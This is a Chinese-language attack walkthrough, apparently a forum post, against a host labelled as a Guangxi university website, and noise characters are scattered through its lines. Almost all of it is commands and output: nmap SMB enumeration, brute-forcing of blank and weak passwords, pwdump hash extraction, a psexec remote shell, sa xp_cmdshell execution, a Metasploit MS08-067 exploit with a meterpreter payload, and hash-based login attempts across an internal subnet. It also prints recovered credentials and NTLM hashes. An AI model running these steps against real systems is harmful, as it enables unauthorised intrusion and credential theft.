广西师范网站http://202.103.242.241/2 j% k3 R! g- V+ q4 F: i
6 o8 G# T0 }7 {# Z" froot@bt:~# nmap -sS -sV 202.103.242.2414 c0 A' F- ? L* v
" V' B1 y/ \6 ?, D+ S+ xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
/ g) B4 y. k3 ^1 G6 o# g) n, U: w7 p# r, O% ~! S8 S
Nmap scan report for bogon (202.103.242.241)0 k i! {* o8 M& t9 a8 E$ H
6 N3 Z" K4 c, jHost is up (0.00048s latency).4 p% P$ `) p& D( M" P
p; K7 [, B% O5 t3 q8 w4 VNot shown: 993 closed ports
8 h7 w8 ^$ l1 \) ]
1 M0 L# e% {3 @0 NPORT STATE SERVICE VERSION
9 q0 F+ g) J2 g- I" V
3 m% o8 _' M& I135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
2 i8 n/ `/ l9 H7 J6 F4 {
% g7 \5 X% r* I& \1 K8 a139/tcp open netbios-ssn6 F; t. w% e9 c) a+ g' b
: R$ u6 K! O1 a* P9 k8 m
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds1 s' S; P$ z: J' W
' u5 T h9 i& y/ m
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)9 R: e. R( |, }; }
# v+ o+ r8 N. g7 n$ p3 _1026/tcp open msrpc Microsoft Windows RPC7 p4 J3 {; f5 {0 p* Z" c
/ J( E2 M- }5 f) e
3372/tcp open msdtc?
6 o2 L. q. M0 L- ?$ k
/ ^3 D. }; w- H# e3389/tcp open ms-term-serv?6 I% |0 h7 L, X5 ]
# k# L4 a$ O0 ^+ O8 [+ E# E% K
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :/ c/ } }8 G: \ j+ B4 I
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r0 f# M2 W) d; i4 _' r o' P/ m
: ?( A4 M+ o0 }$ @$ @
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions0 e2 N: P+ |* j0 E
/ K( {# |( X% h) O8 `) y& kSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)2 W6 o! ?" }. }# c6 O
2 Q2 P1 S+ m' ^3 @( E R) ASF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
- W4 ~8 `7 [$ o; ~
6 [, @) |! I! t9 U7 oSF:ptions,6,”hO\n\x000Z”);
& p$ h `, _" w9 d: ]! U
5 ~0 E$ L, h4 T! d+ kMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
% M# z" X; I) Q* p
" @% D0 u9 \0 O- m) ?Service Info: OS: Windows1 H( K( T. w/ L4 u* \2 `& X/ x
8 W* B9 }. _% U$ Z$ T( o
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .! ]* W" G* P* G7 U& [ B% H
( H! u0 N- t% v/ ]; S3 `/ d( N
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
" _# Z4 o* G6 O% S: F- d+ g- H: b4 h& I7 j" l$ J9 _
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
( f) H5 N7 @- k, q. {9 J+ i
u& g. M* K1 M1 `( |- ?-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse# ^% R1 [# {2 k, y3 m: ]
o3 w" T B3 Q6 O. H5 X. Q-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse( Z9 g+ M$ A" c7 ^% x1 q3 K
[, e a" K% `# n# H9 a$ s-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse8 B$ A" _, \8 z2 g
" }$ Q8 \7 Q' M-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse- o! e" ^; Y! B
, g a% O$ m; n) M
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse* N) {6 b9 a* \! `
+ e3 z9 E- Q7 b1 u-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
) u+ y8 C. X! M7 F5 n: \, r/ D
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse5 U. v+ W5 q& N6 U: u1 K5 |
0 q; ?1 l Y1 K1 G: u-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
: E$ V9 k6 D: G- v) p' K g
7 i1 N1 K4 ^" D, `-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse' _$ I% O( s, J
9 _7 ^& i, i3 Y. G
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse: O% W* j7 |5 x) W: T+ p
* }0 M, V0 d$ v0 Z; x8 s8 L-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse& y2 R6 v0 n6 _7 s2 G
/ W5 |% l1 [7 a. N2 D/ z& l-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
1 }% O4 O+ X+ @& m$ F) M: k# r D0 r2 [, p. Z8 p" }/ w6 a7 Z
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
% `' @% J9 A; a6 K; r. `. E; C, C- s# V, \5 Y! o
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
6 x; m" D4 f/ M" y, e: c
" J% x5 N6 f# O-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse( U: p1 ]1 g7 v1 \1 a6 I
6 j; {$ W; r% f! v P- a1 q7 i
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
1 F' x, h7 P1 c" v+ D6 E! K6 k+ `6 Q7 `4 d$ f3 J3 e S; }9 I
//此乃使用脚本扫描远程机器所存在的账户名, l3 l- i" ^; M9 E+ P
) t/ O, j8 B8 n, ^( D) yStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
8 o& f- w) C. u: b5 B! x4 M. z
4 w1 \2 z; f; D2 hNmap scan report for bogon (202.103.242.241)/ M5 m% x+ Z: `. \2 ]
2 v' k! @2 T/ z9 U* S# cHost is up (0.00038s latency).
5 @& K: |: I3 W1 C9 c" h! D8 m5 M. k9 t8 `! x
Not shown: 993 closed ports
5 b- F u5 k+ [" Q. w/ \7 x" I9 E- t0 b g
PORT STATE SERVICE
0 ~1 h x' N/ i6 j5 j- N
3 d- z' K8 w1 B- r135/tcp open msrpc# q5 V3 k, ~- C/ e3 @
0 m$ I! O7 ^3 J
139/tcp open netbios-ssn. V; L: E: s0 _7 U' C& x
" V; k1 }; e; l& j3 K445/tcp open microsoft-ds" Q. O1 n/ v3 j8 |
/ A$ n2 B0 P, d: C1025/tcp open NFS-or-IIS% `+ ^# p/ t4 U
& N1 K2 B/ K* T% g0 s/ X4 V# O
1026/tcp open LSA-or-nterm
" @% w* n N. W3 Z6 c- U7 W% V8 u8 w9 s1 m7 B7 C2 G4 x% K( c7 t
3372/tcp open msdtc
* N, ]4 {5 J, C
! J1 q7 o. I; j- e$ l& J3389/tcp open ms-term-serv
- a/ `9 H6 Y( k+ |& X0 u# q& m1 f. J Y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, }. l; q+ e1 v5 u8 X
5 k# e$ r. _- A* g" i7 A" K! HHost script results:
7 _: Z# w& f- G. ~% `' i4 a
0 Y& T9 b- @6 Z# I: l- {| smb-enum-users:
8 \$ [4 z' y! }, V0 w/ v @
% r! p+ y" G- M' l" r|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
; F# |0 R" w8 [; M
1 v/ L6 K" m& G, @2 o+ q$ X5 eNmap done: 1 IP address (1 host up) scanned in 1.09 seconds3 J; w4 ~0 q- Y, W* z6 w9 Y
! @4 L+ H7 t! Z: g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
, G6 d+ i0 v( ~9 g3 O
1 n% n# V. s; V) N7 f( [//查看共享- r4 y" @% f; |$ Q9 }0 t$ Q3 L9 T y
' a8 s; {1 ]8 M/ s8 `5 a9 v, C @
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST5 a; Z; a; l9 \7 c% a
1 B9 ^' d$ h. z+ b6 Y2 ~Nmap scan report for bogon (202.103.242.241)2 v. l, O6 U; b/ m
; V0 B& o2 P7 V, O* WHost is up (0.00035s latency).
$ }. L3 t# l$ S' R+ @8 J7 g" U7 v- `& `/ P: k5 W# i$ ?4 Z
Not shown: 993 closed ports* P% a, N& H2 Z' S- E
6 z/ O" R3 _5 N, N; _! G
PORT STATE SERVICE
) h7 h" m! G9 V! q* G5 W# J; x) O8 j$ ]
135/tcp open msrpc, h3 T: X7 ^; L$ ?1 \
) V6 U/ S* o8 E5 K( E" W' Z
139/tcp open netbios-ssn7 K7 X \; v1 n& z2 ~1 y' j, O
6 f4 D+ R, F5 J9 j& ~
445/tcp open microsoft-ds
4 e9 e& y; i" h7 w9 p
( O; }5 B+ E6 U, P1025/tcp open NFS-or-IIS
6 D' V h) W' r G! L$ h( J2 ^
7 R/ C; K6 m. G; F7 s, n6 [1026/tcp open LSA-or-nterm
. r+ @, ~4 E% G; h4 l
+ @- Q% p- |3 \3372/tcp open msdtc. ?( H) M3 s( B5 y! n
. b0 m1 z: l+ n; u1 v9 B3389/tcp open ms-term-serv
/ u( s( f6 F" W$ v3 d# x- m/ T# x9 ?/ A- ^( D, j* ?* p% R4 z; Y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 f5 g9 f/ S0 @: R! N* ~- t* u' o
* h8 j# Y; W& g7 P3 N8 z: VHost script results:
% f; f) D* Z; y( K# m6 G4 g7 q
) B9 v* b9 J* w/ N! H% }/ M5 f3 P| smb-enum-shares:
3 f$ u2 p1 g& H, f: B
8 y( H) {* y0 A. W) D W| ADMIN$
) B& Z/ n+ _; ^) r4 P, |- ], M) D
1 z) u9 T+ B/ c, E- k {| Anonymous access: <none>
5 ~3 C4 m9 p& J( m& r( m, p0 k. o7 _) V$ }& i
| C$
7 V4 U" [4 @) T9 s
% W) j* j* M* E& g. t| Anonymous access: <none>
8 f+ b+ C6 n1 u( ^7 U$ Z0 N6 i- c
| IPC$
1 y7 O# z" W/ P9 @3 n# i: a# M
, e& |" n0 a8 j5 I! Q8 l6 l|_ Anonymous access: READ4 o8 c) d( _$ D( U x( h
9 s7 K; e: W1 @: a- `" Z# \
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds7 o3 S9 Q) A0 L: u* k; F7 i3 B
6 N6 _; } m4 a" ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
) U' j2 }# e6 q5 s# _/ A( u( Q( Y0 K- {6 w
//获取用户密码7 X+ W i2 U* i0 D
8 u" u- ^( F1 `8 U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST3 d1 @' s& ]1 O/ k# i h
' S Q9 X( S! E. j
Nmap scan report for bogon (202.103.242.2418)% i" p# P( m8 {5 p9 t1 r
: ?. c" e3 w, H( D( V
Host is up (0.00041s latency).! G8 D p O7 x' G' Z/ P c
/ d/ x6 L% B& w* R* A+ q& e
Not shown: 993 closed ports; M2 e, p: M4 `/ R
6 Y1 ?+ r, e0 S5 x8 I. C
PORT STATE SERVICE
: @; v, N3 u4 p4 R: L- @
# z4 m" j/ C; ~6 V9 ^+ K' M; g/ l135/tcp open msrpc
' ^9 g8 t3 y: l7 \7 b& N% ?: d' v, u6 W# i+ I
139/tcp open netbios-ssn* z- N! @; p, d" O7 j
1 a2 @9 V" E( C( d445/tcp open microsoft-ds
' Q# N9 G+ W5 G; {; Q0 `0 @! I1 O. i
1025/tcp open NFS-or-IIS1 s1 i5 C3 g' b; i% i' v8 G! ~
4 ^3 H R% E' m1 }. u& |8 q" J2 m
1026/tcp open LSA-or-nterm! K8 c( K$ D/ T# {+ u* A- Q
) D$ d/ J5 p6 l z" g! l1 m$ \
3372/tcp open msdtc
: H2 ?1 ^8 O# _; _. y! S
4 _4 o& K; c7 h! k, m# Q& n3389/tcp open ms-term-serv
/ k* @4 X& K7 F, R
) Z5 T: H' y/ y5 I" hMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
7 q7 C' j, y9 c$ Z% D5 F% A( G1 H# p# f7 S, C
Host script results:& \* o/ A8 _: V1 @! |" Z* G
2 K1 H0 I! P1 f2 Q1 n
| smb-brute:
5 y, D% Y5 C# H$ V# m8 h
7 M: b; Y. _/ T% S& l6 p) Padministrator:<blank> => Login was successful1 n/ p) m1 K. M3 n/ H- v4 G& e y% g
% `$ A5 @8 ^2 J0 U4 W. R* g/ v8 f
|_ test:123456 => Login was successful6 J! ^ m. d* Q* `7 |! c& D3 m
- Y+ d& }* }( ?, l& eNmap done: 1 IP address (1 host up) scanned in 28.22 seconds/ v" X& D( z# {% J* G
$ Y7 s1 [! p: |# e" }
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash" I" q9 ]7 w1 B0 M; Z: V1 ^
- d6 |6 ~/ F- [( W( z ]9 Eroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
5 p: a4 D- t) z; ~% [
! U O1 G+ [" [2 Rroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
, t) i8 I9 g/ L E( O
( v& X) Q1 g6 u: d$ [% Lroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
' T4 z2 p! E/ M# Z& f3 X* V
2 p# D+ m' p- f( UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST$ E( T4 n: j* F4 [- @" H
7 n2 f5 R0 w) f4 T \
Nmap scan report for bogon (202.103.242.241)
% o+ h" m8 i, \$ c5 z+ R) V! W" t. e+ e/ Z4 V
Host is up (0.0012s latency).
: ~( ]- B2 h3 _8 S( d# M$ u
/ N$ o/ n3 B* `+ S1 K+ |PORT STATE SERVICE7 E* G, Z- [( m z# h
5 j' P2 }( {/ U! V2 a2 g# p1 o
135/tcp open msrpc/ W6 X8 |8 S m, y; h
# j, ]1 {7 N, }. ]139/tcp open netbios-ssn
9 N8 ]+ e4 F5 q0 X( g" R4 m* m5 [' A [5 m
445/tcp open microsoft-ds
7 L+ x. a& _ `( L5 D
5 h }$ F* k- X7 J' m2 l5 a0 i EMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)( |) g5 _1 m" c5 ]
( O# L5 J5 t$ o& Z# N# c0 \8 fHost script results:
; |* i! r y \) S6 h0 j
! B; `0 `* ]/ ^3 L| smb-pwdump:; @8 X& t" N0 V7 z4 r5 _7 ?! P
# }& W- y, ~& L% U0 D; Y
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************, M2 ?3 Y# W! j' a/ \3 D/ v: y
$ {' n. Y; h6 F| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************( G- G3 a- L1 H2 ~" q' V
& b; d! ~2 d* X% H! S9 v& e# K6 n7 X
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4/ L3 W0 R9 x2 g& m9 a
$ b+ r4 G: O# e- ^|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2# I9 K' I3 t' K e" @9 _
/ K6 h' s* v5 G
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds: {- w, t3 U/ x% P5 s- \
1 ]+ Z) M! h5 TC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell$ @5 G5 x6 |) A7 U4 j
! f# j; ^, V- j9 J, e* B
-p 123456 -e cmd.exe4 `5 b% c" E0 d' j
- T+ H7 W/ [7 V
PsExec v1.55 – Execute processes remotely+ }/ M6 O2 Z% u3 Q3 w
' ^5 i+ V# l. Y& h/ b& v
Copyright (C) 2001-2004 Mark Russinovich/ {! d+ q/ E8 e
; M# T( U/ `( T9 |, D
Sysinternals – www.sysinternals.com
0 D' Z$ h* O( y h& _& d2 t% N0 s% P9 w, W o5 m
Microsoft Windows 2000 [Version 5.00.2195]
$ _$ }* x# w" w+ |9 h, i! y% @4 k: q
(C) 版权所有 1985-2000 Microsoft Corp.+ r6 u0 e2 v! S
" m: s7 u! l1 T
C:\WINNT\system32>ipconfig
" p; J& H5 |8 Y8 P0 Z& ?$ ]5 A8 Z, n- _* Z8 K- `2 w
Windows 2000 IP Configuration
2 G. u4 e8 o4 w/ L& I, [" X$ Z) d7 i- K
Ethernet adapter 本地连接:. g6 k/ ?: \9 h) x( D8 l( v" i
' x; Z7 k1 r$ |4 h! a
Connection-specific DNS Suffix . :
, _- ]. h1 J. r8 J" A
* r5 l9 U& C+ Q$ c3 T, lIP Address. . . . . . . . . . . . : 202.103.242.241
9 V T$ I% P# b* O3 I: V, t5 @* M
Subnet Mask . . . . . . . . . . . : 255.255.255.0
$ P9 r! A2 X8 J" g. F3 D2 J3 N
3 @* i2 \, X8 O: YDefault Gateway . . . . . . . . . : 202.103.1.12 f3 r+ R: f' w* o7 q
; W; J7 `4 v8 @7 }) _% L% PC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
& k: H4 ~8 Y8 x, m7 a+ o% l3 X1 _+ j8 k* {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞. _1 P4 q: [) F& ~0 ?3 F+ q) l
- r$ ~1 j3 O% U/ e) C% E" Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST5 K3 E" R* q( M$ ~5 ]' F
8 J U6 R. G& ~4 c. W6 }0 y. {5 bNmap scan report for bogon (202.103.242.241)
9 Z: k8 v7 ^+ X5 p$ G" Q1 ~* v
- }5 y: E: }7 X3 k7 t& A1 r+ fHost is up (0.00046s latency).( D; j& ]7 b8 o% `. Y+ W7 V
9 V1 {. Q2 X* vNot shown: 993 closed ports4 p& q+ A* z! k
4 M7 e) k3 `0 Q- U
PORT STATE SERVICE
5 t3 Z1 y2 O( `4 j& F; M! T8 P1 v- l/ i0 d+ p+ q
135/tcp open msrpc
/ n$ m! ?% G) f% `" E8 J) {9 g* B* f+ y; ^+ v
139/tcp open netbios-ssn1 c$ n. w2 r3 ?+ R0 G
$ E9 X9 p$ S3 t/ d( e445/tcp open microsoft-ds# p' i% ^4 R- R& Q9 x W
& A9 D( {9 N; W3 m# y. [+ m1025/tcp open NFS-or-IIS
9 B" s7 O4 l, Z" t: b/ d" V$ T: Y3 ?* X2 t& k! P
1026/tcp open LSA-or-nterm
7 \& \' @6 s, p
6 c! W7 O0 ]8 f& R+ L3372/tcp open msdtc
! E8 Y7 Z0 g8 S- p i. h6 S
4 ]7 o: R6 r* C6 G) r# ?3389/tcp open ms-term-serv: O m1 H5 ^: g7 ^- E+ M: D
- p% s3 A4 L) l! k
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& v7 S' d. i: ~% R4 l9 R" ~7 T
8 W9 ], A& c' rHost script results:& K* \) {; I5 ?8 l5 G" B, e9 D
( u6 p" v4 u; i; E H5 M| smb-check-vulns:3 U5 m" F; R" A3 b4 m# |
3 e9 n$ z3 S; [' s* X1 c) C+ r|_ MS08-067: VULNERABLE
, M! _. c, Q5 p" i' U+ N1 |$ v7 Q" g, M
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
\" ^! L( U4 p* _, f( k4 c( t
: x; O( \9 ^4 z9 w8 O f1 e* Rroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
5 K& Z2 D. q) B
: f! }, O: C0 m; }6 |0 l/ A3 tmsf > search ms08
/ s3 I# D5 g& a8 g' ]+ N M* B
% x; Z: O0 {1 W% x1 W5 hmsf > use exploit/windows/smb/ms08_067_netapi- T7 R# X/ V; ]% A. m
2 u% [9 O- X2 b# P" r7 N0 J
msf exploit(ms08_067_netapi) > show options! X* }! |7 w" g' k
4 J( \& ~' S: {" d8 f' J! y' ?msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
/ x3 v2 I& g6 B+ S6 @3 \5 c( s/ d0 Z5 [
msf exploit(ms08_067_netapi) > show payloads
# t; Z, m. V! r* H% ~( k- o. |8 T# S4 c
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
$ l. n1 U5 M+ l+ e! l$ V7 A/ Q: L G: J; W3 ]
msf exploit(ms08_067_netapi) > exploit% u; g4 ?7 n5 ^! U/ B* b
3 U" ?. v7 P4 } A* L' D
meterpreter >3 E7 K. n! x3 q% z1 V
8 u0 h1 n# S0 c1 t" rBackground session 2? [y/N] (ctrl+z)
8 E9 _" D0 h( O7 O7 u, x, ?- }
. o$ `4 N: T) wmsf exploit(ms08_067_netapi) > sessions -l* ~7 X; L8 T" O8 U
8 L/ T2 B' v* h& U, Y w; {( Y
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt5 E5 J1 I- b; k, ^' m+ j
; N b% W- j: D; F _
test3 x* j0 }6 m4 g2 P8 {
- r/ c2 I+ Z! F/ D6 sadministrator! e* W# p8 X0 r: N% y. V0 z
, l0 K6 z& _8 B) V- Lroot@bt:/usr/local/share/nmap/scripts# vim password.txt
9 m+ j; @8 p, s2 e( h0 f$ n+ c3 P. O" K4 [4 C- ]5 o
44EFCE164AB921CAAAD3B435B51404EE* S) g r C& b
: R6 V+ p1 R! f+ qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
?8 [* Z" ~+ c7 O
* c* j. O5 z0 ^: W, y( G9 k //利用用户名跟获取的hash尝试对整段内网进行登录; k5 l* e1 l9 L# V# f5 n, y2 X
3 o+ v. H! @1 `+ v5 E
Nmap scan report for 192.168.1.1056 n# ~% t8 Q2 [
( u7 X, S/ {2 `Host is up (0.00088s latency).& M8 Q, H/ a7 ~" h& n. E; ^
. N- Y. d3 l1 n$ k% W) fNot shown: 993 closed ports
7 S' Y. F% v; |6 k
) n( ?( l) T' ~5 d& rPORT STATE SERVICE
. M) Y; W& {8 X; @ w+ Q4 c, o& Z
, G$ b/ e" Q6 W135/tcp open msrpc+ c9 u" q5 n; u. G7 Z `
. e1 u5 a/ V. `. O' J
139/tcp open netbios-ssn+ x6 J, c) s: w+ J, R* i( D* f
. u' V% h6 }! F' v- Y
445/tcp open microsoft-ds
. y# c j' D$ `7 F3 \9 D; ]8 `
/ |( e! `9 F2 P: N+ h; K8 `1025/tcp open NFS-or-IIS
6 ]' o* o8 Y( Y- T3 W/ y, X
( _, W- Y5 M( G1 e1 ]8 \; @6 ]' K1026/tcp open LSA-or-nterm$ K0 V; [" J* P4 X
- E$ d* f% ^- F
3372/tcp open msdtc4 N$ s. H$ l( h! M- B0 j
9 s) B( `; t; J3 m3 M# M3389/tcp open ms-term-serv
7 D% G8 v: f/ A0 C& A+ E
+ {. p& J+ X. Y6 ~MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& V9 K Q. {5 k( R) M4 h! P7 k, q- n0 K H- a( i6 r7 Z$ x
Host script results:
/ O4 O' C9 ^" M9 g# X3 }1 y7 P) |6 h+ f" y, x; M5 f8 \
| smb-brute:
6 i- q/ e# m; E X& s+ V1 [' }* x- G# T2 P1 L W& {* {( m
|_ administrator:<blank> => Login was successful
5 f7 y& b0 E% V4 _/ r0 H$ ?7 F: ~, e" d& @6 ^8 u
攻击成功,一个简单的msf+nmap攻击~~·- J% x( y! Z7 K8 l/ Z. O4 G( x: D
; I6 `* T9 K, Y3 a
|